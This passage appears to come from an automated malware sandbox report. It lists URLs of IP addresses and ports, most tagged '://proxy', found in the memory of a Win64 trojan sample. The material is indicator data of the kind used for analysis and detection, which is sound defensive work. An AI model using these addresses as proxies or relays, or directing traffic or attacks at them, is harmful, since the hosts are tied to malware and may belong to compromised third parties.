                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:3251://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:32823
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:32823://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5901
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5901://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:8521
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:8521://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.128.133.154:16099
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.128.133.154:16099://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.208:28249
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.208:28249://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.208:7145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.208:7145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.46:13046
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.46:13046://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.46:41773
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.220.46:41773://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.145:3824
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.145:3824://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.145:53672
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.145:53672://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.145:60404
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.145:60404://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.102:52549
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.102:52549://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.55.195:28426
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.55.195:28426://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.8.5:44774
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.8.5:44774://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C778C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.101.99:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.101.99:4145x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.184:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.184:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.42:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.42:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.59:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.59:4145://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.123:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.123:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.208.101:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.208.101:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA740000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.134:46164
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.134:46164://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.217.158.202:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.217.158.202:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.216.68:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.216.68:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.52.217.188
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.52.217.188://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.52.217.188:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.210.245.19
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C904F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.210.245.19://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.210.245.19:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.103.66.15
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.103.66.15://proxyp
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.103.66.15:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C928E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.144.60:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C928E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.144.60:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.147.209:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.147.209:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.207.235.213:1221
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.207.235.213:1221://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C92B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.48.78.52
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.48.78.52://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.48.78.52:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:17621
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:17621://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EE2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:21072
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:21072://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:10293
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:10293://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:14166
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:14166://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:21039
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:21039://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:25323
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:25323://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:28040
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:28040://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:48057
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:48057://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.105.136.28:1995
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.105.136.28:1995://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.19.2:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.19.2:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA740000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA76C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.247.120.3:18080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.247.120.3:18080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF67000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.130.80:3127
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.130.80:3127://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.155.85:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.155.85:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.46.138.233:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.46.138.233:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.46.138.37:33608
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.46.138.37:33608://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.46.138.49:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.46.138.49:8080://proxy
